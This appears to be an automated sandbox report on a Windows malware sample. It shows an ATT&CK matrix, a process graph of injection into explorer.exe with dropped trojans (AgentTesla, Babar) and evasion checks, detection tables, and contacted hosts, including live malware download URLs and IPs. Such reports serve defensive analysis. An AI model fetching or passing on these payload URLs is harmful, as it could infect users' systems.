                      Valid AccountsNative API11DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsProcess Injection512Obfuscated Files or Information2LSASS MemorySystem Information Discovery14Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing23Security Account ManagerSecurity Software Discovery841SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion441SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol25Jamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion441Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 524289 Sample: X5lLjSzDd8.exe Startdate: 18/11/2021 Architecture: WINDOWS Score: 100 52 modenm.site 2->52 54 iplogger.org 2->54 56 4 other IPs or domains 2->56 70 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->70 72 Multi AV Scanner detection for domain / URL 2->72 74 Antivirus detection for URL or domain 2->74 76 12 other signatures 2->76 10 X5lLjSzDd8.exe 2->10         started        13 rfudbri 2->13         started        signatures3 process4 signatures5 94 Contains functionality to inject code into remote processes 10->94 96 Injects a PE file into a foreign processes 10->96 15 X5lLjSzDd8.exe 10->15         started        98 Multi AV Scanner detection for dropped file 13->98 100 Machine Learning detection for dropped file 13->100 18 rfudbri 13->18         started        process6 signatures7 120 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->120 122 Maps a DLL or memory area into another process 15->122 124 Checks if the current machine is a virtual machine (disk enumeration) 15->124 20 explorer.exe 12 15->20 injected 126 Creates a thread in another existing process (thread injection) 18->126 process8 dnsIp9 58 45.87.154.2, 49798, 80 ASN-POSTLTDRU Russian Federation 20->58 60 216.128.137.31, 443, 49765, 49766 AS-CHOOPAUS United States 20->60 62 6 other IPs or domains 20->62 44 C:\Users\user\AppData\Roaming\rfudbri, PE32 20->44 dropped 46 C:\Users\user\AppData\Local\Temp\FB48.exe, PE32 20->46 dropped 48 C:\Users\user\AppData\Local\Temp8E7.exe, PE32 20->48 dropped 50 4 other malicious files 20->50 dropped 86 System process connects to network (likely due to code injection or exploit) 20->86 88 Benign windows process drops PE files 20->88 90 Deletes itself after installation 20->90 92 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->92 25 DA6F.exe 2 20->25         started        29 2D0D.exe 2 20->29         started        31 BEE7.exe 20->31         started        33 2 other processes 20->33 file10 signatures11 process12 dnsIp13 64 45.9.20.149, 10844, 49858 DEDIPATH-LLCUS Russian Federation 25->64 102 Multi AV Scanner detection for dropped file 25->102 104 Detected unpacking (changes PE section rights) 25->104 106 Query firmware table information (likely to detect VMs) 25->106 108 Tries to detect sandboxes / dynamic malware analysis system (registry check) 25->108 110 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->110 112 Machine Learning detection for dropped file 29->112 114 Hides threads from debuggers 29->114 35 BEE7.exe 31->35         started        66 93.115.20.139, 28978, 49821 MVPShttpswwwmvpsnetEU Romania 33->66 68 cdn.discordapp.com 33->68 116 Antivirus detection for dropped file 33->116 118 Injects a PE file into a foreign processes 33->118 38 E8E7.exe 2 33->38         started        40 conhost.exe 33->40         started        42 E8E7.exe 33->42         started        signatures14 process15 signatures16 78 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 35->78 80 Maps a DLL or memory area into another process 35->80 82 Checks if the current machine is a virtual machine (disk enumeration) 35->82 84 Creates a thread in another existing process (thread injection) 35->84

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      X5lLjSzDd8.exe45%VirustotalBrowse
                      X5lLjSzDd8.exe51%ReversingLabsWin32.Trojan.Babar
                      X5lLjSzDd8.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\FB48.exe100%AviraHEUR/AGEN.1137140
                      C:\Users\user\AppData\Local\Temp\E8E7.exe100%AviraHEUR/AGEN.1144480
                      C:\Users\user\AppData\Roaming\rfudbri100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\DA6F.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BEE7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FB48.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E8E7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2D0D.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\DA6F.exe23%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\DA6F.exe54%ReversingLabsWin32.Trojan.Phonzy
                      C:\Users\user\AppData\Local\Temp\E8E7.exe37%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\E8E7.exe67%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\FB48.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\FB48.exe70%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                      C:\Users\user\AppData\Roaming\rfudbri51%ReversingLabsWin32.Trojan.Babar

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      24.2.E8E7.exe.110000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                      20.0.rfudbri.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.E8E7.exe.750000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.E8E7.exe.750000.3.unpack100%AviraHEUR/AGEN.1144480Download File
                      28.0.E8E7.exe.470000.3.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      18.0.BEE7.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.BEE7.exe.21815a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rfudbri.20f15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.X5lLjSzDd8.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      20.1.rfudbri.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.rfudbri.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.BEE7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.E8E7.exe.110000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                      28.0.E8E7.exe.470000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                      19.0.E8E7.exe.750000.2.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.0.E8E7.exe.470000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                      28.0.E8E7.exe.470000.5.unpack100%AviraHEUR/AGEN.1144480Download File
                      28.0.E8E7.exe.470000.2.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      28.0.E8E7.exe.470000.7.unpack100%AviraHEUR/AGEN.1144480Download File
                      28.0.E8E7.exe.470000.9.unpack100%AviraHEUR/AGEN.1144480Download File
                      18.0.BEE7.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.BEE7.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.1.X5lLjSzDd8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.E8E7.exe.470000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                      20.2.rfudbri.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.E8E7.exe.110000.3.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.2.X5lLjSzDd8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.E8E7.exe.750000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                      0.2.X5lLjSzDd8.exe.21015a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.0.E8E7.exe.470000.11.unpack100%AviraHEUR/AGEN.1144480Download File
                      24.0.E8E7.exe.110000.2.unpack100%AviraHEUR/AGEN.1144480Download File
                      19.0.E8E7.exe.750000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      20.0.rfudbri.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.0.E8E7.exe.470000.13.unpack100%AviraHEUR/AGEN.1144480Download File
                      3.0.X5lLjSzDd8.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.E8E7.exe.110000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                      18.1.BEE7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://host-file-host0.com/files/9370_1636985686_7616.exe13%VirustotalBrowse
                      http://host-file-host0.com/files/9370_1636985686_7616.exe100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id22Responsex0%Avira URL Cloudsafe
                      https://cdn.discordapp.com40%URL Reputationsafe
                      http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id19ResponsePp0%Avira URL Cloudsafe
                      http://216.128.137.31/setup.exe%092%VirustotalBrowse
                      http://216.128.137.31/setup.exe%090%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                      https://get.adob0%URL Reputationsafe
                      http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id3Response0%URL Reputationsafe
                      http://45.87.154.2/vN1zS0qN2nD1iF6p/04805958955520964044.exe100%Avira URL Cloudmalware
                      http://service.r0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      privacytoolzforyou-7000.top
                      188.225.85.124
                      truefalse
                        high
                        host-file-host0.com
                        188.225.85.124
                        truefalse
                          high
                          game2030.site
                          8.209.71.17
                          truefalse
                            high
                            api.ipify.org.herokudns.com
                            54.91.59.199
                            truefalse
                              high
                              host-file-host6.com
                              188.225.85.124
                              truefalse
                                high
                                modenm.site
                                80.66.87.32
                                truefalse
                                  high
                                  cdn.discordapp.com
                                  162.159.135.233
                                  truefalse
                                    high
                                    iplogger.org
                                    5.9.162.45
                                    truefalse
                                      high
                                      api.ipify.org
                                      unknown
                                      unknownfalse
                                        high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://host-file-host0.com/files/9370_1636985686_7616.exetrue
                                        • 13%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://cdn.discordapp.com/attachments/903028136416002089/910600430113931304/123f.exefalse
                                          high
                                          http://216.128.137.31/setup.exe%09true
                                          • 2%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://45.87.154.2/vN1zS0qN2nD1iF6p/04805958955520964044.exetrue
                                          • Avira URL Cloud: malware
                                          unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                              high
                                              https://duckduckgo.com/chrome_newtabDA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.564105027.0000000003E75000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567420054.0000000004452000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id12ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/Entity/Id2ResponseE8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://tempuri.org/Entity/Id21ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://support.google.com/chrome/?p=plugin_realDA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://duckduckgo.com/chrome_newtab0ruDA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id15ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.306335693.0000000006840000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://api.ip.sb/ipDA6F.exe, DA6F.exe, 00000011.00000002.524892081.0000000000CE3000.00000040.00020000.sdmp, E8E7.exe, 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, 2D0D.exe, 2D0D.exe, 0000001B.00000002.525274596.0000000001212000.00000020.00020000.sdmp, E8E7.exe, 0000001C.00000000.456220625.0000000000402000.00000040.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DA6F.exe, 00000011.00000002.564895445.0000000003F21000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.564105027.0000000003E75000.00000004.00000001.sdmp, DA6F.exe, 00000011.00000002.567824150.0000000004D32000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.565407928.000000000420D000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567420054.0000000004452000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.578332462.0000000005242000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553519488.0000000002A0F000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id24ResponseDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549862418.0000000002840000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.553806969.0000000002A53000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://support.google.com/chrome/?p=plugin_shockwaveE8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyLtDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseDA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id5ResponseDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsDA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id10ResponseDA6F.exe, 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
